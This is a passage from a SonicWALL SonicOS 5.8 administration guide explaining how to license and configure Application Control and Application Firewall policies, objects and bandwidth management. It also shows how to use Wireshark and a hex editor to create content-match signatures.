the feature is enabled within the SonicOS management interface, you can view charts in the Dashboard >
Real-Time Monitor page and application activity in other Dashboard pages for the identified/classified
flows from the SonicWALL application signature database.
The dynamic Application Control component of Application Intelligence and Control is a separately
licensed service. The SonicWALL Licensing server will only provide the license keys to the SonicWALL
device when you begin a 30-day trial, purchase an Application Firewall license, or purchase a Security
Services licen se bundle. The Application Co ntrol component allows you to create and enforce custom
policies for logging, blocking, and bandwidth management of ap plication traffic handled by your network.
Licensing is available on www.mysonicwall.com on the Service Management - Associated Products page
under GATEWAY SERVICES.
The Security Services license bundle includes licenses for the following subscription services:
• Gateway Anti-Virus
• Gateway Anti-Spyware
• Intrusion Prevention Ser vi ce
• Application Firewall / Application Control
Application Control and Application Firewall
21
Using Application Control
Application signature updates and signature updates for other Security Services are periodically downloaded
to the SonicWALL appliance, when these ser vices are licensed.
NoteIf you disable Visualization in the SonicOS management interface, application signature
updates are discontinued until the feature is enabled again.
When High Availability is configured between two SonicWALL appliances, the appliances can share the
Security Services license. To use this feature, you must register the SonicWALL appliances on
MySonicWALL as Associated Products. Both appliances must be the same SonicWALL model.
NoteFor a High Availability pair, even if you first register your appliances on MySonicWALL, you
must individually register both the Primary and the Backup appliances from the SonicOS
management interface while logged into the individual
appliance. This allows the Backup unit to synchronize with the SonicWALL license server
and share licenses with the associated Primary appliance. When Internet access is
restricted, you can manually apply the shared licenses to both appliances.
management IP address of each
Using Application Firewall and Application Control
You can configure Application Control in the user interface of the supported SonicWALL security
appliances. This section contains the following subsections:
• “Configuration Overview” on pag e 26
• “Configuring Application Firewall Global Settings” on page 27
• “Configuring Application Control Policies” on page 27
• “Using the Application Firewall Wizard” on page 33
• “Configuring Match Objects” on page 35
• “Configuring Application List Objects” on page 37
• “Configuring Action Objects” on page 38
• “Configuring Email Address Objects” on page 39
• “Configuring Application Layer Bandwidth Management” on page 40
• “Configuring an Application Firewall Policy” on page 43
• “Verifying Your Configuration” on page 45
Configuration Overview
Y ou can configure policie s in Application Fi rewa ll using the wizard or man uall y. The wizard provides a safe
method of configuration and helps prevent errors that could result in unnecessar y blocking of network
traffic.
22
Manual configuration offers more flexibility for situations that require custom actions or policies.
You can configure Application Control global policies for application categories, signatures, or specific
applications on the Firewall > App Rules Advanced page. To include any of the same items in an Application
Firewall policy, you can configure match objects for these application categories, signatures, or specific
applications on the Firewall > Match Objects page.
Application Control and Application Firewall in SonicOS 5.8
Configuring Application Firewall Global Settings
The Firewall > App Rules page contains two global settings:
• Enable Application Firewall
• Global Log Redundancy Filter
Y ou must enable Application Fir ewall to activ ate the functionality. Application Firewall is separately licensed
on www.mysonicwall.com on the Service Management - Associated Products page under GATEWAY
SERVICES. You can view the status of your license at the top of the Firewall > App Rules page, as shown
in Figure 13.
Figure 13Application Firewall Global Settings
.
Using Application Control
To enable Application Firewall and configure the global settings:
Step 1To enable Application Firewall, select the Enable Application Firewall checkbox.
Step 2To log all policy matches, leave the Global Log Redundancy Filter field set to zero. To enforce a delay
between log entries for matches to the same policy, enter the number of seconds to delay.
Global log redundancy settings apply to all Application Firewall policies . If set to z ero, a log entry is created
for each policy match found in passing traffic. Other values specify the minimum number of seconds
betw een lo g entries f or mul tiple match e s to t he sam e poli cy. For example, a log redundancy setting of 10 will
log no more than one message every 10 seconds for each policy match. Log redu n d an c y c a n a l s o be set o n a
per-policy basis in the Add/Edit Policy page where each individual policy configuration has its own log
redundancy filter setting that can override the global log redundancy filter setting.
Configuring Application Control Policies
The Firewall > App Rules Advanced page provides a way to configure global Application Control policies
using categories, applications, and signatures. Policies configured on this page are independent from
Application Firewall policies, and do not need to be added to an Application Firewall policy to take effect.
You can configure the following settings on this page:
• Select a category, an application, or a signature.
• Select blocking, logging, or both as the action.
• Specify users, groups, or IP address ranges to include in or exclude from the action.
• Set a schedule for enforcing the controls.
Application Control and Application Firewall
21
Using Application Control
While these application control settings are independent from Application Firewall policies, you can also
create application match objects for any of the categories , applications, or signatures available here, and use
those match objects in an Application Firewall policy. See the “ Application List Objects” section on page 15
for more information.
Configuring Application Control by Category
Category based configuratio n is the most broadly based meth od of policy configuration on the Firewall >
App Rules Advanced page. The list of categories is shown in Figure 14.
Figure 14List of Application Categories
To configure an Application Control policy for an application category:
Step 1Navigate to the Firewall > App Rules Advanced page.
Step 2Under Application Control Policies, select an application category from the Category drop-down list. A
Configure button appears to the right of the field as soon as a category is selected.
22
Application Control and Application Firewall in SonicOS 5.8
Using Application Control
Step 3Click the Configure button to open up the Application Control Category Settings window for the
selected category.
Step 4To block applications in this categor y, select Enable in the Block drop-down list.
Step 5To create a log entry when applications in this category are detected, select Enable in the Log drop-down
list.
Step 6To target the selected block or log actions to a specific user or group of users, select a user group or
individual user from the Included Users/Groups drop-down list. Select All to apply the policy to all users.
Step 7To exclude a specific user or group of users from the selected block or log actions, select a user group or
individual user from the Excluded Users/Groups drop-down list. Select None to apply the policy to all
users.
Step 8T o target the selected block or log acti ons to a specific IP address or address range, select an Address Group
or Address Object from the Included IP Address Range drop-down list. Select All to apply the policy to
all IP addresses.
Step 9To exclude a specific IP address or address range from the selected block or log actions, select an Address
Group or Address Object from the Excluded IP Address Range drop-down list. Select None to apply
the policy to all IP addresses.
Step 10 To enable this policy during specific days of the week and hours of the day, select one of the following
schedules from the Schedule drop-down list:
• Always on – Enable the policy at all times.
• Work Hours – Enable the policy Monday through Friday, 8:00 AM to 5:00 PM.
• M-T-W-T-F 08:00 to 17:00 – Enable the policy Monday through Friday, 8:00 AM to 5:00 PM.
• After Hours – Enable the policy Monday through Friday, 5:00 PM to 8:00 AM.
• M-T-W-T-F 00:00 to 08:00 – Enable the policy Monday through Friday, midnight to 8:00 AM.
• M-T-W-T-F 17:00 to 24:00 – Enable the policy Monday through Friday, 5:00 PM to midnight.
• SU-S 00:00 to 24:00 – Enable the policy at all times (Sunday through Saturday, 24 hours a day).
• Weekend Hours – Enable the policy Friday at 5:00 PM through Monday at 8:00 AM.
Step 11 To specify a delay between log entries for repetitive events, type the number of seconds for the delay into
the Log Redundancy Filter field.
Step 12 Click OK.
Application Control and Application Firewall
21
Using Application Control
Configuring Application Control by Application
Application based configuration is the middle level of policy configuration on the Firewall > App Rules
Advanced page, between the category based and signature based levels. A partial list of Gaming applications
is shown in Figure 15.
Figure 15Partial List of Gaming Applications
This configuration method allows you to create policy r ules specific to a single application if you want to
enforce the policy settings only on the signatures of this application without affecting other applications in
the same category.
To configure an Application Control policy for a specific application:
Step 1Navigate to the Firewall > App Rules Advanced page.
Step 2Under Application Control Policies, first select a category from the Categor y drop-down list.
Step 3Next, select an application in this category from the Application drop-down list. A Configure button
appears to the right of the field as soon as an application is selected.
22
Application Control and Application Firewall in SonicOS 5.8
Using Application Control
Step 4Click the Configure button to open up the Application Control Application Settings window for the
selected application. The fields at the top of the window are not editable . These fields d isplay the v alue s for
the Application Category and Application Name. The application configuration parameters default to the
current settings of the category to which the application belongs. To retain this connectio n to the category
settings for one or more fields, leave this selection in place for those fields.
Step 5To block this application, select Enable in the Block drop-down list.
Step 6To create a log entry when this application is detected, select Enable in the Log drop-down list.
Step 7To target the selected block or log actions to a specific user or group of users, select a user group or
individual user from the Included Users/Groups drop-down list. Select All to apply the policy to all users.
Step 8To exclude a specific user or group of users from the selected block or log actions, select a user group or
user from the Excluded Users/Groups drop-down list. Select None to apply the policy to all users.
Step 9T o target the selected block or log acti ons to a specific IP address or address range, select an Address Group
or Address Object from the Included IP Address Range drop-down list. Select All to apply the policy to
all IP addresses.
Step 10 To exclude a specific IP address or address range from the selected block or log actions, select an Address
Group or Address Object from the Excluded IP Address Range drop-down list. Select None to apply
the policy to all IP addresses.
Step 11 To enable this policy during specific days of the week and hours of the day, select one of the following
schedules from the Schedule drop-down list:
• Always on – Enable the policy at all times.
• Work Hours – Enable the policy Monday through Friday, 8:00 AM to 5:00 PM.
• M-T-W-T-F 08:00 to 17:00 – Enable the policy Monday through Friday, 8:00 AM to 5:00 PM.
• After Hours – Enable the policy Monday through Friday, 5:00 PM to 8:00 AM.
• M-T-W-T-F 00:00 to 08:00 – Enable the policy Monday through Friday, midnight to 8:00 AM.
• M-T-W-T-F 17:00 to 24:00 – Enable the policy Monday through Friday, 5:00 PM to midnight.
• SU-S 00:00 to 24:00 – Enable the policy at all times (Sunday through Saturday, 24 hours a day).
• Weekend Hours – Enable the policy Friday at 5:00 PM through Monday at 8:00 AM.
Step 12 To specify a delay between log entries for repetitive events, type the number of seconds for the delay into
the Log Redundancy Filter field.
Step 13 To see detailed information about the application, click here in the Note at the bottom of the window.
Step 14 Click OK.
Application Control and Application Firewall
21
Using Application Control
Configuring Application Control by Signature
Signature based configuration is the lowest, most specific, level of policy configuration on the Firewall >
App Rules Advanced page.
Setting a policy based on a specific signature allows you to configure policy settings for the individual
signature without influence on other signatures of the same application.
To configure an Application Control policy for a specific signature:
Step 1Navigate to the Firewall > App Rules Advanced page.
Step 2Under Application Control Policies, first select a category from the Categor y drop-down list.
Step 3Next, select an application in this category from the Application drop-down list.
Step 4To display the specific signatures for this application, select Signature in the Viewed by drop-down list.
The Freestyle gaming application has two signatures.
Step 5Click the Configure button in the row for the signature you want to work with. The Application Control
Signature Settings window opens. The fields at the top of the window are not editable. These fields display
the values for the Signature Category, Signature Name, Si gnature ID, Priority, and Direction of the traffic in
which this signature can be detected.
The default policy settings for the signature are set to the current settings for the application to which the
signature belongs. To retain this connectio n to the application settings for one or more fields, leave this
selection in place for those fields.
22
Application Control and Application Firewall in SonicOS 5.8
Using Application Control
Step 6To block this signature, select Enable in the Block drop-down list.
Step 7To create a log entry when this signature is detected, select Enable in the Log drop-down list.
Step 8To target the selected block or log actions to a specific user or group of users, select a user group or
individual user from the Included Users/Groups drop-down list. Select All to apply the policy to all users.
Step 9To exclude a specific user or group of users from the selected block or log actions, select a user group or
individual user from the Excluded Users/Groups drop-down list. Select None to apply the policy to all
users.
Step 10 To target the selected block or log actions to a specific IP address or address range, sel ect an Address Group
or Address Object from the Included IP Address Range drop-down list. Select All to apply the policy to
all IP addresses.
Step 11 To exclude a specific IP address or address range from the selected block or log actions, select an Address
Group or Address Object from the Excluded IP Address Range drop-down list. Select None to apply
the policy to all IP addresses.
Step 12 To enable this policy during specific days of the week and hours of the day, select one of the following
schedules from the Schedule drop-down list:
• Always on – Enable the policy at all times.
• Work Hours – Enable the policy Monday through Friday, 8:00 AM to 5:00 PM.
• M-T-W-T-F 08:00 to 17:00 – Enable the policy Monday through Friday, 8:00 AM to 5:00 PM.
• After Hours – Enable the policy Monday through Friday, 5:00 PM to 8:00 AM.
• M-T-W-T-F 00:00 to 08:00 – Enable the policy Monday through Friday, midnight to 8:00 AM.
• M-T-W-T-F 17:00 to 24:00 – Enable the policy Monday through Friday, 5:00 PM to midnight.
• SU-S 00:00 to 24:00 – Enable the policy at all times (Sunday through Saturday, 24 hours a day).
• Weekend Hours – Enable the policy Friday at 5:00 PM through Monday at 8:00 AM.
Step 13 To specify a delay between log entries for repetitive events, type the number of seconds for the delay into
the Log Redundancy Filter field.
Step 14 To see detailed information about the signature, click here in the Note at the bottom of the window.
Step 15 Click OK.
Using the Application Firewall Wizard
The Application Firewall wizard provides safe configuration for many common use cases, but not for
everything. If at any time during the wizard you are unable to find the options that you need, you can click
Cancel and proceed using manual configuration. To use the wizard to configure Application Firewall,
perform the following steps:
Step 1Login to the SonicWALL security appliance.
Step 2In the SonicWALL banner at the top of the screen, click the Wizards icon. The wizards Welcome screen
displays.
Step 3Select the Application Firewall Wizard radio button and then click Next.
Step 4In the Application Firewall Wizard Introduction screen, click Next.
Step 5In the Application Firewall Policy Type screen, click a selection for the policy type, and then click Next.
You can choose among SMTP, incoming POP3, Web Access, or FTP file transfer. The policy that you
create will only apply to the type of traffic that you select. The next screen will vary depending on your
choice here.
Application Control and Application Firewall
21
Using Application Control
Step 6In the Select <your choice> Rules for Application Firewall screen, select a policy rule from the choices
supplied, and then click Next.
Depending on your choice in the previous step, this screen is one of four possible screens:
• Select SMTP Rules for Application Firewall
• Select POP3 Rules for Application Firewall
• Select Web Access Rules for Application Firewall
• Select FTP Rules for Application Firewall
Step 7The screen displayed here will vary depending on your choice of policy rule in the previous step. For the
following policy rules, the wizard displays the Set Application Firewall Object Keywords and Policy
Direction screen on which you can select the traffic direction to scan, and the content or keywords to
match.
• All SMTP policy rule types except Specify maximum email size
• All POP3 policy rule types
• All W eb Access policy rule types except Look for usage of certain web browsers and Look for usage
• All FTP policy types except Make all FTP access read-only and Disallow usage of SITE command
In the Set Application Firewall Object Keywords and Policy Direction screen, perform the following
steps:
of any web browser, except the ones specified
• In the Direction drop-down list, select the traffic direction to scan from the drop-down li st. Select one
of Incoming, Outgoing, or Both.
• Do one of the following:
NoteIf you selected a choice with the words except the ones specified in the
previous step, content that you enter here will be the only content that does not
cause the action to occur. See “Negative Matching” on page 14.
–
In the Content text box, type or paste a text or hexadecimal representation of the content to match,
and then click Add. Repeat until all content is added to the List text box.
–
To import keywords from a predefined text file that contains a list of content values, one per line,
click Load From File.
• Click Next.
If you selected a policy type in the previous step that did not result in the Set Application Firewall Object
Keywords and Policy Direction screen with the standard options, the wizard displays a screen that allows
you to select the traffic direction, and certain other choices depending on the policy type.
• In the Direction drop-down list, select the traffic direction to scan.
• SMTP: In the Set Maximum Email Size screen, in the Maximum Email Size text box, enter the
maximum number of bytes for an email message.
• Web Access: In the Application Firewall Object Settings screen, the Content text box has a
drop-down list with a limited number of choices, and no Load From File button is available. Select a
browser from the drop-down list.
• FTP: In the special-case Set Application Firewall Object Keywords and Policy Direction screen,
you can only select the traffic direction to scan.
22
• Click Next.
Application Control and Application Firewall in SonicOS 5.8
Using Application Control
Step 8In the Application Firewall Action Settings screen, select the action to take when matching content is
found in the specified type of network traffic, and then click Next.
You will see one or more of the following choices depending on the policy type, as shown below:
Policy TypeAvailable Action
All TypesLog Only
All TypesBypass DPI
SMTPBlocking Action - block and send custom email reply
SMTPBlocking Action - block without sending email reply
SMTPAdd Email Banner (append text at the end of email)
POP3Blocking Action - disable attachment and add custom text
Web AccessBlocking Action - custom block page
Web AccessBlocking Action - redirect to new location
Web AccessBlocking Action - Reset Connection
Web AccessManage Bandwidth
Step 9In the second Application Firewall Action Settings screen (if it is displayed), in the Content text box,
type the text or URL that you want to use, and then click Next.
The second Application Firewall Action Settings screen is only displayed when you selected an action in
the previous step that requires additional text. For a Web Access policy type, if you selected an action that
redirects the user, you can type the new URL into the Content text box.
Step 10 In the Select Name for Application Fir ewall Policy screen, in the Policy Name text box, type a
descriptive name for the policy, and then click Next.
Step 11 In th e Confirm Policy Settings screen, review the displayed values for the new policy and do one of the
following:
• To create a policy using the displayed configuration values, click Apply.
• To change one or more of the values, click Back.
• To exit the wizard without creating the policy, click Cancel.
Step 12 In the App lication F irewall Policy Comple te screen, to exit the wizard, click Close.
NoteYou can configure Application F irewall policies without using the wizard. When configuring
manually, you must remember to configure all components, including match objects,
actions, email user objects if required, and finally, a policy that references them.
Configuring Match Objects
This section describes how to manually create a match object.
For detailed information about match object types, see “Match Objects” on page 9.
Application Control and Application Firewall
21
Using Application Control
To configure a match object, perform the following steps:
Step 1In the navigation pane on the left side, click Firewall and then click Match Objects.
Step 2In the Match Objects screen, click Add New Match Object.
Step 3In the Match Object Settings window, in the Object Name text box, type a descriptive name for the object.
Step 4Select an Match Object Type from the drop-down list. Your selection here will affect available options in
this screen. See Table 2 on page 10 for a description of match object types.
Step 5Select a Match Type from the drop-down list. The available selections depend on the match object type.
Step 6For the Input Representation, click Alphanumeric to match a text pattern, or click Hexadecimal if you
want to match binary content.
Step 7In the Content text box, type the pattern to match, and then click Add. The content appears in the List
text box. Repeat to add another element to match.
22
Application Control and Application Firewall in SonicOS 5.8
Alternatively, you can click Load From File to import a list of elements from a text file. Each element in
the file must be on a line by itself.
Step 8To remove an element from the list, select the element in the List box and then click Remove. To remove
all elements, click Remove All.
Step 9Click OK.
Configuring Application List Objects
This section describes how to create an application list object, which can be used by Application Firewall
policies in the same way as a match object.
For detailed information about application list object types include inform ation about the Security tab and
Category tab, see “Application List Objects” on page 15 .
To configure an application list object, perform the following steps:
Step 1In the navigation pane on the left side, click Firewall and then click Match Objects.
Step 2Near the bottom of the page, click the Add Application List Object button. The Create Filter Object
page opens, shown here on the Application tab.
Using Application Control
You can control which applications are displayed by selecting one or more application categories, threat
levels, and technologies. When the application list is reduced to a list that is focussed on your preferences,
you can select the individual applications for your filter.
Step 3In the Category pane, select the checkboxes for one or more application categories.
Step 4In the Threat Level pane, select the checkboxes for one or more threat levels.
Application Control and Application Firewall
21
Using Application Control
Step 5In the Technology pane, select the checkboxes for one or more technologies.
Step 6Click the plus sign next to each appl ication y ou w ant to add to y our filter object. To display a description of
the application, click its name in the Name column. As you select the applications for your filter, the plus
sign icon becomes a green checkmark icon and the selected applications appear in the Application Group
pane on the right. You can edit the list in this field by deleting individual items or by clicking the eraser to
delete all items.
Step 7When finished selecting the applications to include, type in a name for the object in the Object Name fiel d.
Step 8Click the Save Application Filter button. You will see the object name listed on the Firewall > Match
Objects page with an object type of Application List. This object can then be selected when creating an
Application Firewall policy.
Configuring Action Objects
If you do not want one of the predefined actions , you can select one of the configurable actions . The Actions
Objects Settings window, shown in Figure 16, provides a way to customize a configurable action with text
or a URL. The predefined actions plus any configurable actions that you have created are available for
selection when you create a policy. For more information about actions, see “Action Objects” on page 19.
Figure 16Action Objects Settings
To configure settings for an action, perform the following steps:
Step 1In the navigation pane on the left side, click Firewall, and then click Action Objects.
Step 2In the Action Objects screen, click Add New Action Object.
Step 3In the Action Objects Settings window, type a descrip tive name for the action.
Step 4In the Actions drop-down list, select the action that you want.
Step 5In the Content text box, type the text or URL to be used in the action.
22
Application Control and Application Firewall in SonicOS 5.8
Step 6If HTTP Block P age was selected as the action, a Color drop-down l ist is displa yed. Choose a background
color for the block page from the Color drop-down list. Color choices are white, yellow, red, or blue.
Step 7Click OK.
Configuring Email Address Objects
You can create email address objects for use with SMTP Client policies. An email address object can be a
list of users or an entire domain.
For more information about email address objects, see “Email Address Objects” on page 23.
Figure 17Email Address Object Window
Using Application Control
To configure email address object settings, perform the following steps:
Step 1In the navigation pane on the left side, click Firewall, and then click Email Address Objects.
Step 2In the Email Address Objects screen, click Add New Email Address Object.
Step 3In the Email Address Object window, type a descriptive name for the email address object.
Step 4For Match Type, select Exact Match or Par tial Match. Use Parti al Match when you want to match on
any part of the email address that you provide. To match the email address exactly, select Exact Match.
Step 5In the Content text box, type the content to matc h and then click Add. Repeat this step until you hav e added
as many elements as you want.
For example, to match on a domain, select Parti al Ma tch in the previous ste p and then type @ followed
by the domain name in the Content field, for example, type: @sonicwall.com. To match on an individual
user, select Exact Match in the previous step and then type the full email addr ess in the Content field, for
example: jsmith@sonicwall.com.
Alternatively, you can click Load From File to import a list of elements from a text file. Each element in
the file must be on a line by itself.
By defining an email address object with a list of users, you can use Application Firewall to simulate groups.
To use application layer bandwidth management, you must first enable bandwidth management on the
interface that will handle the traffic. Once enabled, y ou can select Bandwidth Management in the Action Settings drop-down list.
See the following sections for configuration details:
• “Configuring Bandwidth Management on an Interface” on page 40
• “Configuring a Bandwidth Management Action” on page 41
Configuring Bandwidth Management on an Interface
To enable bandwidth management on an interface, perform the f ollowing steps:
Step 1In the navigation pane on the left side, click Network, and then click Interfaces.
Step 2In the Interface Settings table, click the icon under Configure for the desired interface.
Step 3In the Edit Interface window, cl ick the Advanced tab. The Advanced Settings screen displays.
Figure 18Edit Interface - Advanced
22
Step 4
Do one or both of the following:
• Under Bandwidth Management, to manage outbound bandwidth, select the Enable Egr ess
Bandwidth Management checkbox, and optionally set the Available Interface Egress Bandwidth
(Kbps) field to the maximum for the interface. See Tabl e 4.
Application Control and Application Firewall in SonicOS 5.8
Using Application Control
• Under Bandwidth Management, to manage inbound bandwidth , select the Enable Ingress
Bandwidth Management checkbox and optionally set the Available Interface Ingress Bandwidth
(Kbps) field to the maximum for the interface. See Tabl e 4.
Table 4Maximum Interface Bandwidth Settings
Interface RatingMax Bandwidth in Kilobits/second
100 Megabits per second100,000
1 Gigabit per second1,000,000
Step 5
Click OK.
Configuring a Bandwidth Management Action
After bandwidth management is enabled on the interface, you can configure Bandwidth Management as an
action setting for an object in ApplicationControl.
To configure Bandwidth Management as an action setting:
Step 1In the navigation pane on the left side, click Firewall, and then click Action Objects.
Step 2In the Action Objects screen, click Add New Action Object.
Step 3In the Action Objects Settings window, type a descriptive name for the action.
Step 4In the Action drop-down list, select Bandwidth Management.
Figure 19Custom Bandwidth Management Action
Application Control and Application Firewall
21
Using Application Control
Step 5In the Bandwidth Aggregation Method drop-down list, select one of the following:
• Per Po l i c y – When multiple policies are using the same Bandwidth Management action, the total
• Per A c t i o n – When multiple policies are using the same Bandwidth Management action, each policy
Step 6Do one or both of the following:
• To manage outbound bandwidth, select the Enable Outbound Bandwidth Management ch e ck box .
• To manage inbound bandwidth, select the Enable Inbound Bandwidth Management ch eck box.
Step 7To specify the Guaranteed Bandwidth, optionally enter a value either as a percentage or as kilobits per
second. In the drop-down list, select either % or Kbps.
If you plan to use this custom action for rate limiting rather than guaranteeing bandwidth, you do not need
to change the Guaranteed Bandwidth field.
Step 8To specify the Maximum Bandwidth, optionally enter a value either as a percentage or as kilobits per
second. In the drop-down list, select either % or Kbps.
If you plan to use this custom action for guaranteeing bandwidth rather than rate limiting, you do not need
to change the Maximum Bandwidth field.
Step 9For Bandwidth Priority, select a priority level from the drop-down list, where 0 is the highest and 7 is the
lowest.
bandwidth is limited as configured for all policies combined if they are active at the same time.
can consume up to the configured bandwidth even when the policies are active at the same time.
Step 10 Optionally select Enable Tracking Bandwidth Usage to track the usage.
Step 11 Click OK.
You can see the resulting action in the Action Objects screen, as shown in Figure 20.
Figure 20Bandwidth Management Action
22
Application Control and Application Firewall in SonicOS 5.8
Configuring an Application Firewall Policy
When you have created a match object, and optionally, an action or an email user object, you are ready to
create a policy that uses them.
For information about policies and policy types, see “Application Firewall Policies” on page 6.
Figure 21Policy Settings
Using Application Control
To configure a policy, perform the following steps:
Step 1In the navigation pane on the left side, click Firewall, and then click App Rules.
Step 2Below the Application Firewall Policies table, click Add New Policy.
Step 3In the Application Firewall Policies Settings window, type a descriptive name into the Policy Name
field.
Step 4Select a Polic y Ty p e from the drop-down list. Your selection here will affect available options in the
window. For information about available policy types, see “Application Firewall Policies” on page 6.
Step 5Select a source and destination Address Group or Address Object from the Address drop-down lists. Only
a single Address field is available for IPS Content, App Control Content, or CFS policy types.
Step 6Select the source or destination service from the Service drop-down lists. Some policy types do not provide
a choice of service.
Step 7For Exclusion Address, optionally select an Address Group or Address Object from the drop-down list.
This address will not be affected by the policy.
Application Control and Application Firewall
21
Using Application Control
Step 8For Match Object (or Application Object), select a match object from the drop-down list. The list
contains the defined match objects that are applicable to the policy type.
Step 9For Action, select an action from the drop-down list. The list contains actions that are applicable to the
policy type, and can include the predefined actions , plus any customized actions . F or a log-only policy, select
No Action.
Step 10 For Users/Gr oups, select from the drop-down lists for both Included and Excluded. The selected users
or group under Excluded will not be affected by the policy.
Step 11 If the policy type is SMTP Client, select from the drop-down lists for MAIL FROM and RCPT TO, for
both Included and Excluded. The selected users or group under Excluded will not be affected by the
policy.
Step 12 For Schedule, select from the drop-down list. The list provides a variety of schedules for the policy to be
in effect.
Step 13 If you want the policy to create a log entry when a match is found, select the Enable Logging checkbox.
Step 14 To record more details in the log, select the Log individual object content checkbox.
Step 15 If the policy type is IPS Content, select the Log using IPS messa ge format checkbox to display the
category in the log entr y as “Intr usion Prevention” rather than “Application Firewall”, and to use a prefix
such as “IPS Detection Alert” in the log message rather than “A ppli cation Fire wall Alert.” This is useful if
you want to use log filters to search for IPS alerts.
Step 16 If the policy type is App Control Content, select the Log using App Control message format checkbox
to display the category in the log entry as “Application Control” rather than “Application Firewall”, and to
use a prefix such as “Application Control Detection Alert” in the log messag e rather than “Application
Firewall Alert.” This is useful if you want to use log filters to search for Application Control alerts.
Step 17 If the policy type is CFS, select the Log using CFS message format checkbox to display the category in
the log entry as “Network Access” rather than “ Applica tion Firewall”, and to use a log message such as “W eb
site access denied” in the log message rather than no prefix. This is useful if you want to use log filters to
search for content filtering alerts.
Step 18 For Log Redundancy Filter, you can either select Global Settings to use the global value set on the
Firewall > App Rules page, or you can enter a number of seconds to delay between each log entry for this
policy. T he local setting overrides the global setting only for this policy; other policies are not affected.
Step 19 For Connection Side, select from the drop-down list. The available choi ces d epend on the policy type and
can include Client Side, Server Side, or Both, referring to the side where the traffic originates. IPS
Content, App Control Content, or CFS policy types do not provide this configuration option.
Step 20 For Direction, click either Basic or Advanced and select a direction from the drop-do wn list. Basic allows
you to select incoming, outgoing, or both. Advanced allows you to select between zones, such as LAN to
WAN. IPS Content, App Control Content, or CFS policy types do not provide this configuration option.
Step 21 If the policy type is IPS Content, App Control Content, or CFS, select a zone from the Zone drop-down
list. The policy will be applied to this zone.
Step 22 If the policy type is CFS, select an entry from the CFS Allow List drop-down list. The list contain s any
defined CFS Allow/Forbidden List type of match objects, and also provides None as a selection. The
domains in the selected entry will not be affected by the policy.
Step 23 If the policy type is CFS, select an entry from the CFS Forbidden List drop-down list. The list contains
any defined CFS Allow/Forbidden List type of match objects, and also pro vides None as a selection. The
domains in the selected entry will be denied access to matching content, instead of having the defined action
applied.
Step 24 If the policy type is CFS, select the Enable Safe Search Enforcement checkbox to prevent safe search
enforcement from being disabled on search engines such as Google, Yahoo, Bing, and others.
Step 25 Click OK.
22
Application Control and Application Firewall in SonicOS 5.8
Verifying Your Configuration
To verify your policy configuration, you can send some traffic that should match your policy. You can use a
network protocol analyzer such as Wireshark to view the packets. For infor mation about using Wireshark,
see “Wireshark” on page 45.
Be sure to test for both included and excluded users and groups. You should also run tests according to the
schedule that you configured, to determine that the policy is in effect when you want it to be. Check for log
entries in the Log > View screen in the SonicOS user interface.
You can view tooltips on the Firewall > App Rules page when you hover your cursor over each policy. The
tooltips show details of the match objects and actions for the policy. Also, the bottom of the page shows
the number of policies defined, enabled, and the maximum number of policies allowed.
Useful Tools
This section describes two software tools that can help you use Application Control and Application
Firewall to the fullest extent. The following tools are described:
• “Wireshark” on page 45
• “Hex Editor” on page 48
Using Application Control
Wireshark
Step 1In Wireshark, click Capture > Interfaces to view your local network interfaces.
Wireshark is a network protocol analyzer that you can use to capture packets from applications on your
network. You can examine the packets to determine the unique identifier for an application, which you can
use to create a match object for use in an Application Firewall policy.
Wireshark is freely available at the following location:
http://www.wireshark.org/
The process of finding the unique identifier or signature of a Web browser is illustrated in the following
packet capture sequence.
Application Control and Application Firewall
21
Using Application Control
Step 2In the Capture Interfaces window, click Capture to start a capture on your main network interface:
Step 3As soon as the capture begins, start the browser and then stop the capture. In this example, Firefox is
started.
22
Application Control and Application Firewall in SonicOS 5.8
Using Application Control
Step 4In the captured output, locate and click the HTTP GET command in the top pane, and view the source
for it in the center pane. In the source code, locate the line beginning with User-Agent.
Step 5Scroll to the right to find the unique identifier for the browser. In this case it is Firefox/1.5.0.7.
Application Control and Application Firewall
21
Using Application Control
Step 6T ype the identifier into the Content text box in the Match Objects Settings screen and click OK to create
a match object that you can use in a policy.
Hex Editor
Y ou can use a hex adecimal (hex) editor to vie w the hex representation of a file or a graphic image. One such
hex editor is XVI32, developed by Christian Maas and available at no cost at the following URL:
For example, if there is a certain graphic contained within all confidential company documents, you could
use the hex editor to obtain a unique identifier for the graphic, and then use the identifying hex string to
create a match object. You could reference the match object in a policy that blocks the transfer of files with
content matching that graphic.
Figure 22SonicWALL Graphic
22
Application Control and Application Firewall in SonicOS 5.8
Using the SonicWALL graphic in Figure 22 as an example, you would take the following steps:
Step 1Start XVI32 and click File > Open to open the graphic image GIF file.
Using Application Control
Step 2In the left pane, mark the first 50 hex character block by selecting Edit > Block <n> chars… and then
select the decimal option and type 50 in the space provided. This will mark the first 50 characters in the
file, which is sufficient to generate a unique thumbprint for use in a custom match object.
Alternatively you can mark the block by using the following sequence:
• Click on the first character (#0).
• Press Ctrl+B.
• Click on the character in position #49.
• Press Ctrl+B.
To locate the character in position #49, click on a character in the right pane (the text pane) and then look
at the bottom left corner for the decimal address. Try different characters until it shows Adr. dec: 49. Note
that you must click on the corresponding location in the left pane before you press Ctrl+B to mark the block.
Application Control and Application Firewall
21
Using Application Control
When the block is marked, it changes to red font. To unmark a block of characters, press Ctrl+U.
Step 3After you mark the block, click Edit > Clipboard > Copy As Hex String.
Step 4In Textpad or another text editor, press Ctrl+V to paste the selection and then press Enter to end the line.
This intermed iar y ste p is necessary to allow you to remove spaces from the hex string.
Step 5In Textpad, click Search > Replace to bring up the Replace dialog box. In the Replace dialog box, type a
space into the Find field and leave the Replace field empty. Click Replace All .
The hex string now has 50 hex characters with no spaces between them.
Step 6Double-click the hex string to select it, then press Ctrl+C to copy it to the clipboard.
Step 7In the SonicOS user interface, navigate to Firewall > Match Objects and click Add Match Object.
Step 8In the Match Object Settings window, type a descriptive name into the Object Name text box.
Step 9In the Match Object Type drop-down list, select Custom Object.
Step 10 For Input Representation, click Hexadecimal.
Step 11 In th e Content text box, press Ctrl+V to paste the contents of the clipboard.
22
Application Control and Application Firewall in SonicOS 5.8
Step 12 Click Add.
Using Application Control
Step 13 Click OK.
Y ou now hav e an Match Object containing a unique identifier for the image. You can create a policy to block
or log traffic that contains the image matched by this Match Object. For information about creating a policy ,
see “Configuring an Application Firewall Policy” on page 43.
Application Control and Application Firewall
21
Using Application Control
Use Cases
Application Firewall provides the functionality to handle several types of access control very efficiently . The
following use cases are presented in this section:
• “Policy-Based Application Control” on page 53
• “Compliance Enforcement” on page 55
• “Server Protection” on page 55
• “Hosted Email Environments” on page 56
• “Email Control” on page 56
• “Web Browser Control” on page 57
